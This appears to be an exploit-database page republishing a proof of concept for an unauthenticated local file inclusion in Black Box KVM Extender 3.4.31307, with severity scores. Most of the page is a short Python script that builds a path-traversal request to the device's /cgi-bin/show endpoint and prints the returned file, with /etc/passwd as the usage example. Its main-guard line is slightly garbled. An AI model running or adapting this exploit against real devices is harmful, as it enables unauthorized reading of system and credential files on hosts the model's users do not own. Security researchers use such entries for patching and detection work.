Advertisement






Black Box Kvm Extender 3.4.31307 Local File Inclusion

CVE Category Price Severity
N/A CWE-98 N/A High
Author Risk Exploitation Type Date
N/A High Local 2021-07-07
CVSS EPSS EPSSP
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.04731 0.66946

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070053

Below is a copy:

Black Box Kvm Extender 3.4.31307 Local File Inclusion
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat il
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath

import requests
import sys

if name == 'main':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
        r = requests.get(payload)
        print(r.text)
    else:
        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
            

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.